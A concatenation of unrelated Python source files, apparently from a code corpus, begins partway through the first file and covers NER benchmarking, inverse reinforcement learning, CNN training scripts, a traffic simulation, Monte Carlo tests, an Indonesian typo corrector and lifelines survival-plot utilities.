_USE_CUDA=True
_N_GPUS = 3
os.environ["CUDA_VISIBLE_DEVICES"]=','.join([str(i) for i in range(_N_GPUS)])
_USE_QUANTIZE=False
_BATCH_SIZE=8
@app.route('/transner/v0.7/benchmarks', methods=['POST'])
def benchmarks():
"""This API returns the extracted entities for each sentence.
Returns:
[list] -- list of dictionaries containing, for each input string, the list of entities with type, value and offset.
e.g.
{'sentence': 'Mr. Robinson lives in Reeds.'
'entities':[
{
'offset': 0,
'type': PER,
'value': Mr. Robinson
},
{
'offset': 22,
'type': LOC,
'value': Reeds
}
]}
"""
device = 'GPU' if _USE_CUDA else 'CPU'
test_string = request.get_json()['strings'][0]
sentence_len = len(test_string.split())
test_array = [test_string for _ in range(_BATCH_SIZE)]
print('device={}; batch={}; sentence_len={}'.format(device, _BATCH_SIZE, sentence_len))
exec_times = []
mem_usages = []
for iteration in range(10):
print('------- RUN #{} -------'.format(iteration+1))
start = time.time()
curr_mem_usage = memory_usage((do_ner, (test_array,)))
end = time.time()
mem_usages.append(max(curr_mem_usage))
exec_times.append(end-start)
max_mem = max(mem_usages)
min_mem = min(mem_usages)
avg_mem = sum(mem_usages)/len(mem_usages)
avg_ms = sum(exec_times) / len(exec_times)
m_count = (avg_ms/60) % 60
s_count = avg_ms % 60
ms_count = avg_ms - int(avg_ms)
mem_str='max_mem={} MiB; min_mem={} MiB; avg_mem={} MiB'.format(round(max_mem), round(min_mem), round(avg_mem))
time_str='execution time: {}m:{}s:{}ms'.format(round(m_count), round(s_count), int(ms_count*1000))
print(mem_str)
print(time_str)
print('---------------------')
return jsonify('{} {}'.format(mem_str, time_str)), 200
@profile
def do_ner(raw_input_strings):
# select the model and run NER
model = model_dict['NERmodel']
# reset preprocesser internal structures
model.reset_preprocesser()
ner_dict = model.ner(raw_input_strings, apply_regex=True, apply_gazetteers=True)
return ner_dict
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--port',
type=int,
required=True,
help='Port to allocate for the rest api'
)
args = parser.parse_args()
model_dict['NERmodel'] = Transner(pretrained_model=SetupParameters['PRETRAINED_MODEL'],
quantization=_USE_QUANTIZE,
use_cuda=_USE_CUDA,
n_gpus=_N_GPUS)
app.run(host='0.0.0.0', debug=True, port=args.port)
|
#!/usr/bin/env python
import gridworld as W
import maxent as M
import plot as P
import trajectory as T
import solver as S
import optimizer as O
import mce_irl as I
# import frozenlake_mce_irl as I
import numpy as np
import matplotlib.pyplot as plt
import os
import time
def get_policy(start):
pass
def sttl_goal_reach(D, goal):
'''
F[0, T] (Pr[pos = goal] > threshold)
'''
goal = goal[0]
end_time = 12
threshold = 0.99
formula = "F[0,{}] (Pr[pos = goal] > {})".format(end_time, threshold)
print("StTL goal-reach formula: ", formula)
count = 0
n_samples = len(D)
for sample in D:
visited = []
transitions = sample._t
n = len(transitions)
for i in range(n):
visited.append(transitions[i][0])
visited.append(transitions[-1][-1])
# print(transitions)
# print(visited)
idx = visited.index(goal)
if idx <= end_time:
count += 1
prob = (count / n_samples)
rho = prob - threshold
# print("Probability of reaching the goal: %.2f" % (prob))
return rho
def get_d2obs(policy, avoid_states):
d2obs = []
for s in policy:
dmin = float("inf")
for obs in avoid_states:
d = abs(s - obs)
dmin = min(dmin, d)
d2obs.append(dmin)
return d2obs
def sttl_obstacle_avoid(D, goal, avoid_states):
'''
G (Pr[dist2obs > dmin] > 0.99)
'''
goal = goal[0]
threshold = 0.99
dmin = 2
formula = "G (Pr[dist2obs > {}] > {})".format(dmin, threshold)
print("StTL obstacle-avoidance formula: ", formula)
count = 0
n_samples = len(D)
for sample in D:
visited = []
transitions = sample._t
n = len(transitions)
for i in range(n):
visited.append(transitions[i][0])
visited.append(transitions[-1][-1])
# print(transitions)
# print(visited)
d2obs = np.array(get_d2obs(visited, avoid_states))
d = np.min(d2obs - dmin)
if d <= 0:
count += 1
prob = (count / n_samples)
rho = prob - threshold
# print("Probability of reaching the goal: %.2f" % (prob))
return rho
def main():
# Grid-world setup parameters
grid_size = 8 # grid-world size
p_slip = 0.2 # slip. with probability p_slip, agent chooses other 3 actions. Default 0.3
# avoid_states = [7, 9, 11] # for 4x4 Frozenlake
# avoid_states = [19, 29, 35, 41, 42, 49, 52, 54, 59] # for 8x8 Frozenlake
# avoid_states = [3, 8, 13, 11, 16, 21]
# avoid_states = [7, 12] # 5x5
# avoid_states = [17, 24, 31] # 7x7
# avoid_states = [2, 3, 4, 9, 10, 11, 37, 38, 39, 44, 45, 46]
# avoid_states = [9]
# avoid_states = [2, 7, 22]
avoid_states = [3, 9, 12, 14, 17, 18, 22, 27, 37, 43]
'''
Ground-truth MDP reward:
1. reaching the goal gets a reward of +10
2. reaching avoid-region gets reward 0
3. any other state gets reward of +1
NOTE: This somehow does not learn with negative rewards (idk why),
so I manually designed the ground-truth rewards.
'''
# Generate MCE-IRL rewards from demonstrations
start_time = time.time()
reward_mce, world, goal = I.mce_irl(grid_size, p_slip, avoid_states)
end_time = time.time()
print("Execution time in s: %.3f" %(end_time - start_time))
discount = 0.99 # same as gamma for value iteration. Default 0.7
value = S.value_iteration(world.p_transition, reward_mce, discount)
weighting = lambda x: x**1 # giving importance to sub-optimal actions
policy = S.stochastic_policy_from_value(world, value, w=weighting)
policy_exec = T.stochastic_policy_adapter(policy)
# print("Value\n", value)
# print("Policy\n", policy)
# print("Policy Exec\n", policy_exec)
# Randomly sample policies from the learned reward function
# D = []
# np.random.seed(0)
# n_samples = 20
# for _ in range(n_samples):
# start = np.random.randint(0, 16)
# sample = T.generate_trajectory(world, policy_exec, start, goal)
# # print("Start: %d, Policy:" %(start))
# D.append(sample)
# print("\nTotal samples: %d\n" %(n_samples))
# # Compute the robustness of goal-reach STTL
# rho = sttl_goal_reach(D, goal)
# print("StTL goal-reach robustness = %.2f\n" % (rho))
# # Compute the robustness of obstacle avoidance STTL
# rho = sttl_obstacle_avoid(D, goal, avoid_states)
# print("StTL obstacle-avoidance robustness = %.2f\n" % (rho))
if __name__ == "__main__":
main() |
import pandas as pd, numpy as np
import matplotlib.pyplot as plt, seaborn as sns
url = 'https://raw.githubusercontent.com/datahackformation/Posts-Python-Tips-Tricks/main/Heatmap/titanic.csv'
df = pd.read_csv(url, sep=';').set_index('PassengerId')
df = pd.get_dummies(df, columns=['Pclass'])
df['Sex'] = df['Sex'].map({'male': 0, 'female': 1})
# --> Heatmap
plt.figure(figsize=(16, 6))
mask = np.triu(np.ones_like(df.corr(), dtype=np.bool))
sns.heatmap(
df.corr(),
mask=mask,
vmin=-1,
vmax=1,
annot=True,
cmap='rocket'
)
|
"""Models for facial keypoint detection"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import pytorch_lightning as pl
from pytorch_lightning import Callback
from pytorch_lightning.loggers import TensorBoardLogger
class KeypointModel(pl.LightningModule):
"""Facial keypoint detection model"""
def __init__(self, hparams):
"""
Initialize your model from a given dict containing all your hparams
Warning: Don't change the method declaration (i.e. by adding more
arguments), otherwise it might not work on the submission server
"""
super().__init__()
self.hparams = hparams
########################################################################
# TODO: Define all the layers of your CNN, the only requirements are: #
# 1. The network takes in a batch of images of shape (Nx1x96x96) #
# 2. It ends with a linear layer that represents the keypoints. #
# Thus, the output layer needs to have shape (Nx30), #
# with 2 values representing each of the 15 keypoint (x, y) pairs #
# #
# Some layers you might consider including: #
# maxpooling layers, multiple conv layers, fully-connected layers, #
# and other layers (such as dropout or batch normalization) to avoid #
# overfitting. #
########################################################################
self.model = nn.Sequential(
nn.Conv2d(1, 32, 5), #32,92,92
nn.ReLU(),
nn.MaxPool2d(2, 2), #32,46,46
nn.Dropout(p=0.1),
nn.Conv2d(32, 64, 4), #64,43,43
nn.ReLU(),
nn.MaxPool2d(2, 2), #64,21,21
nn.Dropout(p=0.2),
nn.Conv2d(64, 128, 3), #128,19,19
nn.ReLU(),
nn.MaxPool2d(2, 2), #128,9,9
nn.Dropout(p=0.3),
nn.Conv2d(128, 256, 2), #256,8,8
nn.ReLU(),
nn.MaxPool2d(2, 2), #256,4,4
nn.Dropout(p=0.4),
nn.Flatten(),
nn.Linear(256*4*4, 1024),
nn.ReLU(),
nn.Linear(1024, 256),
nn.ReLU(),
nn.Linear(256,30),
)
########################################################################
# END OF YOUR CODE #
########################################################################
def forward(self, x):
########################################################################
# TODO: Define the forward pass behavior of your model #
# for an input image x, forward(x) should return the #
# corresponding predicted keypoints #
########################################################################
x = self.model(x)
########################################################################
# END OF YOUR CODE #
########################################################################
return x
def general_step(self, batch, batch_idx, mode):
image, keypoints = batch['image'], batch['keypoints']
predicted_keypoints = self.forward(image).view(-1, 15, 2)
loss = F.mse_loss(keypoints, predicted_keypoints)
return loss
def general_end(self, outputs, mode):
# average over all batches aggregated during one epoch
avg_loss = torch.stack([x[mode + '_loss'] for x in outputs]).mean()
return avg_loss
def training_step(self, batch, batch_idx):
loss = self.general_step(batch, batch_idx, "train")
tensorboard_logs = {'loss': loss}
return {'loss': loss, 'log': tensorboard_logs}
def validation_step(self, batch, batch_idx):
loss = self.general_step(batch, batch_idx, "val")
return {'val_loss': loss}
def test_step(self, batch, batch_idx):
loss = self.general_step(batch, batch_idx, "test")
return {'test_loss': loss}
def configure_optimizers(self):
optim = torch.optim.Adam(self.model.parameters(), lr=self.hparams["learning_rate"])
return optim
class DummyKeypointModel(pl.LightningModule):
"""Dummy model always predicting the keypoints of the first train sample"""
def __init__(self):
super().__init__()
self.prediction = torch.tensor([[
0.4685, -0.2319,
-0.4253, -0.1953,
0.2908, -0.2214,
0.5992, -0.2214,
-0.2685, -0.2109,
-0.5873, -0.1900,
0.1967, -0.3827,
0.7656, -0.4295,
-0.2035, -0.3758,
-0.7389, -0.3573,
0.0086, 0.2333,
0.4163, 0.6620,
-0.3521, 0.6985,
0.0138, 0.6045,
0.0190, 0.9076,
]])
def forward(self, x):
return self.prediction.repeat(x.size()[0], 1, 1, 1)
|
import datetime
import math
from physics import Coordinates
from cars import Car
class Node(object):
"""This is a node in a road."""
radius = 20
def __init__(self, coord):
assert isinstance(coord, Coordinates)
self.coord = coord
def __repr__(self):
return '<Node %s>' % self.coord
def filter(self, car):
return car.coordinates.distance(self.coord) > self.radius
class Arc:
def __init__(self, src, dest, index):
assert isinstance(src, Node)
assert isinstance(dest, Node)
self.src = src
self.dest = dest
self.index = index
def __repr__(self):
return '<Arc (%s,%s)->(%s,%s)>' % (self.src.coord.x, self.src.coord.y,
self.dest.coord.x, self.dest.coord.y)
def __eq__(self, arc):
return self.index == arc.index
@property
def angle(self):
"""Get the angle of the current arc."""
dx = float(self.dest.coord.x - self.src.coord.x)
dy = float(self.dest.coord.y - self.src.coord.y)
angle = math.atan(dy / dx)
if dx < 0 and dy < 0:
angle = angle - math.pi
elif dx < 0 and dy > 0:
angle = angle + math.pi
return angle
@property
def length(self):
return self.src.coord.distance(self.dest.coord)
class Road:
"""A road is just a graph. That's it."""
def __init__(self, coords, max_cars=20, birth_frequency=5000):
self.hole = None
self.cars = list()
self.arcs = list()
self.max_cars = max_cars
self.birth_frequency = birth_frequency
self.last_car_generated_at = datetime.datetime(1970, 1, 1)
assert len(coords) > 1
src = None
arc_index = 0
for coord in coords:
dest = Node(Coordinates(coord))
if src:
self.arcs.append(Arc(src, dest, arc_index))
arc_index += 1
src = dest
self.hole = src
def generate_cars(self, nb_cars):
"""Add new cars on the map if necessary."""
now = datetime.datetime.now()
last_generation_delta = now - self.last_car_generated_at
milliseconds_delta = sum((last_generation_delta.seconds * 1000,
last_generation_delta.microseconds / 1000))
new_car = None
if milliseconds_delta > self.birth_frequency and nb_cars < self.max_cars:
new_car = Car(self.arcs[0], 16)
self.last_car_generated_at = now
return new_car
def leading_car(self, car):
"""Returns the next car.
TODO: don't limit ourselves to the current arc.
"""
next_car = Car(car.arc, 0, float('Inf'))
next_car.total_distance = float('Inf')
for other_car in self.cars:
if all((other_car.total_distance > car.total_distance,
other_car.total_distance < next_car.total_distance)):
next_car = other_car
return next_car
def pointlist(self):
"""Returns a list of tuples corresponding to the nodes coordinates."""
points = list()
for arc in self.arcs:
points.append((arc.src.coord.x, arc.src.coord.y))
points.append((arc.dest.coord.x, arc.dest.coord.y))
return points
def update(self, delta):
"""Update the road status."""
new_cars = self.generate_cars(len(self.cars))
if new_cars:
self.cars.append(new_cars)
self.cars = filter(self.hole.filter, self.cars)
for car in self.cars:
car.update(self, delta)
if car.distance >= car.arc.length:
arc = self.arcs[car.arc.index + 1]
car.set_arc(arc)
|
"""
Test for mcsim package - monte carlo NumPy module.
"""
import math
import mcsim.monte_carlo_np as mc
import numpy as np
def test_calculate_distance_np_1():
"""
Test calculate distance function
"""
point1=np.array([0,0,0])
point2=np.array([0,1,0])
expected = np.array([1.0])
observed = mc.calculate_distance_np(point1,point2)
assert np.array_equal(expected, observed)
# write a test for the calculate distance function which tests for the periodic boundary conditions
def test_calculate_distance_np2():
"""
Test periodic boundary condition for calculate distance function
"""
point1= np.array([[0, 0, 0],[0, 1, 0]])
point2= np.array([[0, 8, 0],[0, 1.5, 0]])
box_length = 3.3
expected = np.array([1.4, 0.5])
observed = mc.calculate_distance_np(point1,point2,box_length)
assert np.allclose(expected, observed)
def test_calculate_lj_np_1():
"""
Test the Lennard Jones pair energy
"""
assert mc.calculate_lj_np(1) == 0
def test_calculate_lj_np_2():
"""
Test the Lennard Jones pair energy
"""
assert mc.calculate_lj_np(math.pow(2, (1/6))) == -1.0
def test_calculate_total_energy_np():
"""
Test calculating the total energy
"""
coordinates = np.array([[0, 0, 0], [0, math.pow(2, 1/6), 0], [0, 2*math.pow(2, 1/6), 0]])
assert np.isclose(mc.calculate_total_energy_np(coordinates, 10, 3.0), -2.031005859375)
def test_calculate_pair_energy_np_1():
"""
Test calculating the total energy
"""
coordinates = np.array([[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]])
assert mc.calculate_pair_energy_np(coordinates, 1, 10, 3) == -2
def test_calculate_pair_energy_np_2():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy_np(coordinates, 0, 10, 3) == mc.calculate_pair_energy_np(coordinates, 2, 10, 3)
def test_calculate_pair_energy_3():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy_np(coordinates, 0, 10, 2) == -1
|
import tensorflow as tf
import keras
import numpy as np
import os
import matplotlib.pyplot as plt
URL = r'https://storage.googleapis.com/mledu-datasets/cats_and_dogs_filtered.zip'
path_to_zip = tf.keras.utils.get_file('cats_and_dogs.zip', origin=URL, extract=True)
PATH = os.path.join(os.path.dirname(path_to_zip), 'cats_and_dogs_filtered')
train_dir = os.path.join(PATH, 'train')
validation_dir = os.path.join(PATH, 'validation')
train_cats_dir = os.path.join(train_dir, 'cats')
train_dogs_dir = os.path.join(train_dir, "dogs")
val_cats_dir = os.path.join(validation_dir, 'cats')
val_dogs_dir = os.path.join(validation_dir, 'dogs')
train_total = len(os.listdir(train_cats_dir)) + len(os.listdir(train_dogs_dir))
val_total = len(os.listdir(val_cats_dir)) + len(os.listdir(val_dogs_dir))
print(train_total, val_total)
train_image_gen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255, horizontal_flip=True, rotation_range=45, zoom_range=0.5, width_shift_range=.15, height_shift_range=.15)
val_image_gen = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1./255)
train_data = train_image_gen.flow_from_directory(batch_size=16, directory=train_dir, target_size=(150, 150), class_mode='binary')
val_data = val_image_gen.flow_from_directory(batch_size=16, directory=validation_dir, target_size=(150, 150), class_mode='binary')
model = keras.Sequential(
[keras.layers.Conv2D(32, (3, 3), padding='same', activation="relu", input_shape=(150, 150, 3)),
keras.layers.MaxPooling2D(),
keras.layers.Conv2D(32, 3, padding='same', activation='relu'),
keras.layers.MaxPooling2D(),
keras.layers.Conv2D(64, 3, padding='same', activation='relu'),
keras.layers.MaxPooling2D(),
keras.layers.Conv2D(64, 3, padding='same', activation='relu'),
keras.layers.MaxPooling2D(),
keras.layers.Flatten(),
keras.layers.Dense(64, activation='relu'),
keras.layers.Dropout(.5),
keras.layers.Dense(1, activation='sigmoid'),
]
)
model.summary()
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
hist = model.fit_generator(train_data, epochs=50, steps_per_epoch=train_total//16, validation_data=val_data, validation_steps=val_total//16)
model.save_weights('image_weights.h5')
epochs = range(50)
plt.figure(figsize=(10,10))
plt.subplot(1,2,1)
plt.plot(epochs, hist.history['loss'])
plt.plot(epochs, hist.history['val_loss'], 'ro')
plt.subplot(1,2,2)
plt.plot(epochs, hist.history['accuracy'])
plt.plot(epochs, hist.history['val_accuracy'], 'ro')
plt.show() |
#!/usr/bin/env python
import os
import subprocess
import sys
out = subprocess.check_output(['find . -name \"*txt\"'], shell=True)
stats = out.split('\n')
import hashlib
stats_md5 = [(fname, hashlib.md5(open(fname, 'rb').read()).digest())
for fname in stats if fname]
for i in stats_md5:
for j in stats_md5:
if i[0]==j[0]: continue
if i[1]==j[1]:
namei = i[0].split('/')[1]
namej = j[0].split('/')[1]
if namei != namej:
print "Match!", i[0], j[0]
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
print("Test")
print("New") |
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import re
class KataIndo:
def __init__(self):
self.scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
self.creds = ServiceAccountCredentials.from_json_keyfile_name(
'../auth/kata-indo.json', self.scope)
self.client = gspread.authorize(self.creds)
self.typo_sheet = self.client.open('kata-typo-indo').sheet1
self.typo_words = self.typo_sheet.get_all_values()
# Memperbagus kata
def fixWord(self, word):
status = False
word = re.sub(r'[?|$|.|!|,|@|#|%|^|*|(|)|_|-|+|=|/|{|}|;|:|"|\'|\||[|\]|/|\||\\]',r'',word)
chars1 = [char for char in word]
for word_list in self.typo_words:
words = word_list[1].split(",")+[word_list[0]]
for wordx in words:
chars2 = [char for char in wordx]
chars3 = [item for item in chars2 if item in chars1]
if len(chars3) == len(chars2) and set(chars1).issubset(chars3):
status = True
break
if status:
word = ""
return word.join(chars3)
break
# Menerjemahkan kata typo
def setWord(self, search):
searchs = self.fixWord(search)
if searchs is not None:
for word_list in self.typo_words:
word = word_list[1].split(",")
if searchs in word:
return word_list[0]
break
return searchs
else:
return search
# Menyambungkan kata-kata menjadi kalimat
def listToString(self, list_word):
sentence = " "
return sentence.join(list_word)
# Kalimat fix
def sentenceFix(self, sentence):
word_split = sentence.split()
sentence_fix = []
for word in word_split:
sentence_fix.append(word.replace(word, self.setWord(word)))
return self.listToString(sentence_fix)
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import warnings
import numpy as np
from lifelines.utils import coalesce
def is_latex_enabled():
"""
Returns True if LaTeX is enabled in matplotlib's rcParams,
False otherwise
"""
import matplotlib as mpl
return mpl.rcParams["text.usetex"]
def remove_spines(ax, sides):
"""
Remove spines of axis.
Parameters:
ax: axes to operate on
sides: list of sides: top, left, bottom, right
Examples:
removespines(ax, ['top'])
removespines(ax, ['top', 'bottom', 'right', 'left'])
"""
for side in sides:
ax.spines[side].set_visible(False)
return ax
def move_spines(ax, sides, dists):
"""
Move the entire spine relative to the figure.
Parameters:
ax: axes to operate on
sides: list of sides to move. Sides: top, left, bottom, right
dists: list of float distances to move. Should match sides in length.
Example:
move_spines(ax, sides=['left', 'bottom'], dists=[-0.02, 0.1])
"""
for side, dist in zip(sides, dists):
ax.spines[side].set_position(("axes", dist))
return ax
def remove_ticks(ax, x=False, y=False):
"""
Remove ticks from axis.
Parameters:
ax: axes to work on
x: if True, remove xticks. Default False.
y: if True, remove yticks. Default False.
Examples:
removeticks(ax, x=True)
removeticks(ax, x=True, y=True)
"""
if x:
ax.xaxis.set_ticks_position("none")
if y:
ax.yaxis.set_ticks_position("none")
return ax
def add_at_risk_counts(*fitters, **kwargs):
"""
Add counts showing how many individuals were at risk at each time point in
survival/hazard plots.
Arguments:
One or several fitters, for example KaplanMeierFitter,
NelsonAalenFitter, etc...
Keyword arguments (all optional):
ax: The axes to add the labels to. Default is the current axes.
fig: The figure of the axes. Default is the current figure.
labels: The labels to use for the fitters. Default is whatever was
specified in the fitters' fit-function. Giving 'None' will
hide fitter labels.
Returns:
ax: The axes which was used.
Examples:
# First train some fitters and plot them
fig = plt.figure()
ax = plt.subplot(111)
f1 = KaplanMeierFitter()
f1.fit(data)
f1.plot(ax=ax)
f2 = KaplanMeierFitter()
f2.fit(data)
f2.plot(ax=ax)
# There are equivalent
add_at_risk_counts(f1, f2)
add_at_risk_counts(f1, f2, ax=ax, fig=fig)
# This overrides the labels
add_at_risk_counts(f1, f2, labels=['fitter one', 'fitter two'])
# This hides the labels
add_at_risk_counts(f1, f2, labels=None)
"""
from matplotlib import pyplot as plt
# Axes and Figure can't be None
ax = kwargs.get("ax", None)
if ax is None:
ax = plt.gca()
fig = kwargs.get("fig", None)
if fig is None:
fig = plt.gcf()
if "labels" not in kwargs:
labels = [f._label for f in fitters]
else:
# Allow None, in which case no labels should be used
labels = kwargs["labels"]
if labels is None:
labels = [None] * len(fitters)
# Create another axes where we can put size ticks
ax2 = plt.twiny(ax=ax)
# Move the ticks below existing axes
# Appropriate length scaled for 6 inches. Adjust for figure size.
ax2_ypos = -0.15 * 6.0 / fig.get_figheight()
move_spines(ax2, ["bottom"], [ax2_ypos])
# Hide all fluff
remove_spines(ax2, ["top", "right", "bottom", "left"])
# Set ticks and labels on bottom
ax2.xaxis.tick_bottom()
# Match tick numbers and locations
ax2.set_xlim(ax.get_xlim())
ax2.set_xticks(ax.get_xticks())
# Remove ticks, need to do this AFTER moving the ticks
remove_ticks(ax2, x=True, y=True)
# Add population size at times
ticklabels = []
for tick in ax2.get_xticks():
lbl = ""
for f, l in zip(fitters, labels):
# First tick is prepended with the label
if tick == ax2.get_xticks()[0] and l is not None:
if is_latex_enabled():
s = "\n{}\\quad".format(l) + "{}"
else:
s = "\n{} ".format(l) + "{}"
else:
s = "\n{}"
lbl += s.format(f.durations[f.durations >= tick].shape[0])
ticklabels.append(lbl.strip())
# Align labels to the right so numbers can be compared easily
ax2.set_xticklabels(ticklabels, ha="right")
# Add a descriptive headline.
ax2.xaxis.set_label_coords(0, ax2_ypos)
ax2.set_xlabel("At risk")
plt.tight_layout()
return ax
def plot_lifetimes(
duration,
event_observed=None,
entry=None,
left_truncated=False,
sort_by_duration=False,
event_observed_color="#A60628",
event_censored_color="#348ABD",
**kwargs
):
"""
Retuns a lifetime plot, see examples: https://lifelines.readthedocs.io/en/latest/Survival%20Analysis%20intro.html#censorship
Parameters
-----------
duration: (n,) numpy array or pd.Series
duration subject was observed for.
event_observed: (n,) numpy array or pd.Series
array of booleans: True if event observed, else False.
entry: (n,) numpy array or pd.Series
offsetting the births away from t=0. This could be from left-truncation, or delayed entry into study.
left_truncated: boolean
if entry is provided, and the data is left-truncated, this will display additional information in the plot to reflect this.
sort_by_duration: boolean
sort by the duration vector
Returns
-------
ax
"""
set_kwargs_ax(kwargs)
ax = kwargs.pop("ax")
N = duration.shape[0]
if N > 80:
warnings.warn("For less visual clutter, you may want to subsample to less than 80 individuals.")
if event_observed is None:
event_observed = np.ones(N, dtype=bool)
if entry is None:
entry = np.zeros(N)
if sort_by_duration:
# order by length of lifetimes; probably not very informative.
ix = np.argsort(duration, 0)
duration = duration[ix]
event_observed = event_observed[ix]
entry = entry[ix]
for i in range(N):
c = event_observed_color if event_observed[i] else event_censored_color
ax.hlines(N - 1 - i, entry[i], entry[i] + duration[i], color=c, lw=1.5)
if left_truncated:
ax.hlines(N - 1 - i, 0, entry[i], color=c, lw=1.0, linestyle="--")
m = "" if not event_observed[i] else "o"
ax.scatter(entry[i] + duration[i], N - 1 - i, color=c, marker=m, s=10)
ax.set_ylim(-0.5, N)
return ax
def set_kwargs_ax(kwargs):
from matplotlib import pyplot as plt
if "ax" not in kwargs:
kwargs["ax"] = plt.figure().add_subplot(111)
def set_kwargs_color(kwargs):
kwargs["c"] = coalesce(kwargs.get("c"), kwargs.get("color"), kwargs["ax"]._get_lines.get_next_color())
def set_kwargs_drawstyle(kwargs):
kwargs["drawstyle"] = kwargs.get("drawstyle", "steps-post")
def create_dataframe_slicer(iloc, loc):
user_did_not_specify_certain_indexes = (iloc is None) and (loc is None)
user_submitted_slice = slice(None) if user_did_not_specify_certain_indexes else coalesce(loc, iloc)
get_method = "loc" if loc is not None else "iloc"
return lambda df: getattr(df, get_method)[user_submitted_slice]
def plot_loglogs(cls, loc=None, iloc=None, show_censors=False, censor_styles=None, **kwargs):
"""
Specifies a plot of the log(-log(SV)) versus log(time) where SV is the estimated survival function.
"""
def loglog(s):
return np.log(-np.log(s))
if (loc is not None) and (iloc is not None):
raise ValueError("Cannot set both loc and iloc in call to .plot().")
if censor_styles is None:
censor_styles = {}
set_kwargs_ax(kwargs)
set_kwargs_color(kwargs)
set_kwargs_drawstyle(kwargs)
kwargs["logx"] = True
dataframe_slicer = create_dataframe_slicer(iloc, loc)
# plot censors
ax = kwargs["ax"]
colour = kwargs["c"]
if show_censors and cls.event_table["censored"].sum() > 0:
cs = {"marker": "+", "ms": 12, "mew": 1}
cs.update(censor_styles)
times = dataframe_slicer(cls.event_table.loc[(cls.event_table["censored"] > 0)]).index.values.astype(float)
v = cls.predict(times)
# don't log times, as Pandas will take care of all log-scaling later.
ax.plot(times, loglog(v), linestyle="None", color=colour, **cs)
# plot estimate
dataframe_slicer(loglog(cls.survival_function_)).plot(**kwargs)
ax.set_xlabel("log(timeline)")
ax.set_ylabel("log(-log(survival_function_))")
return ax
def plot_estimate(
cls,
estimate=None,
loc=None,
iloc=None,
show_censors=False,
censor_styles=None,
ci_legend=False,
ci_force_lines=False,
ci_alpha=0.25,
ci_show=True,
at_risk_counts=False,
invert_y_axis=False,
bandwidth=None,
**kwargs
):
""""
Plots a pretty figure of {0}.{1}
Matplotlib plot arguments can be passed in inside the kwargs, plus
Parameters
-----------
show_censors: bool
place markers at censorship events. Default: False
censor_styles: bool
If show_censors, this dictionary will be passed into the plot call.
ci_alpha: bool
the transparency level of the confidence interval. Default: 0.3
ci_force_lines: bool
force the confidence intervals to be line plots (versus default shaded areas). Default: False
ci_show: bool
show confidence intervals. Default: True
ci_legend: bool
if ci_force_lines is True, this is a boolean flag to add the lines' labels to the legend. Default: False
at_risk_counts: bool
show group sizes at time points. See function ``add_at_risk_counts`` for details. Default: False
loc: slice
specify a time-based subsection of the curves to plot, ex:
.plot(loc=slice(0.,10.))
will plot the time values between t=0. and t=10.
iloc: slice
specify a location-based subsection of the curves to plot, ex:
.plot(iloc=slice(0,10))
will plot the first 10 time points.
invert_y_axis: bool
boolean to invert the y-axis, useful to show cumulative graphs instead of survival graphs.
bandwidth: float
specify the bandwidth of the kernel smoother for the
smoothed-hazard rate. Only used when called 'plot_hazard'.
Returns
-------
ax:
a pyplot axis object
"""
plot_estimate_config = PlotEstimateConfig(
cls, estimate, loc, iloc, show_censors, censor_styles, bandwidth, **kwargs
)
dataframe_slicer = create_dataframe_slicer(iloc, loc)
if show_censors and cls.event_table["censored"].sum() > 0:
cs = {"marker": "+", "ms": 12, "mew": 1}
cs.update(plot_estimate_config.censor_styles)
times = dataframe_slicer(cls.event_table.loc[(cls.event_table["censored"] > 0)]).index.values.astype(float)
v = cls.predict(times)
plot_estimate_config.ax.plot(times, v, linestyle="None", color=plot_estimate_config.colour, **cs)
dataframe_slicer(plot_estimate_config.estimate_).plot(**plot_estimate_config.kwargs)
# plot confidence intervals
if ci_show:
if ci_force_lines:
dataframe_slicer(plot_estimate_config.confidence_interval_).plot(
linestyle="-",
linewidth=1,
color=[plot_estimate_config.colour],
legend=ci_legend,
drawstyle=plot_estimate_config.kwargs.get("drawstyle", "default"),
ax=plot_estimate_config.ax,
alpha=0.6,
)
else:
x = dataframe_slicer(plot_estimate_config.confidence_interval_).index.values.astype(float)
lower = dataframe_slicer(plot_estimate_config.confidence_interval_.filter(like="lower")).values[:, 0]
upper = dataframe_slicer(plot_estimate_config.confidence_interval_.filter(like="upper")).values[:, 0]
fill_between_steps(
x,
lower,
y2=upper,
ax=plot_estimate_config.ax,
alpha=ci_alpha,
color=plot_estimate_config.colour,
linewidth=1.0,
)
if at_risk_counts:
add_at_risk_counts(cls, ax=plot_estimate_config.ax)
if invert_y_axis:
# need to check if it's already inverted
original_y_ticks = plot_estimate_config.ax.get_yticks()
if not getattr(plot_estimate_config.ax, "__lifelines_inverted", False):
# not inverted yet
plot_estimate_config.ax.invert_yaxis()
# don't ask.
y_ticks = np.round(1.000000000001 - original_y_ticks, decimals=8)
plot_estimate_config.ax.set_yticklabels(y_ticks)
plot_estimate_config.ax.__lifelines_inverted = True
return plot_estimate_config.ax
class PlotEstimateConfig:
def __init__(self, cls, estimate, loc, iloc, show_censors, censor_styles, bandwidth, **kwargs):
self.censor_styles = coalesce(censor_styles, {})
set_kwargs_ax(kwargs)
set_kwargs_color(kwargs)
set_kwargs_drawstyle(kwargs)
self.estimate = coalesce(estimate, cls._estimate_name)
self.loc = loc
self.iloc = iloc
self.show_censors = show_censors
# plot censors
self.ax = kwargs["ax"]
self.colour = kwargs["c"]
self.kwargs = kwargs
if (self.loc is not None) and (self.iloc is not None):
raise ValueError("Cannot set both loc and iloc in call to .plot().")
if self.estimate == "hazard_":
if bandwidth is None:
raise ValueError("Must specify a bandwidth parameter in the call to plot_hazard.")
self.estimate_ = cls.smoothed_hazard_(bandwidth)
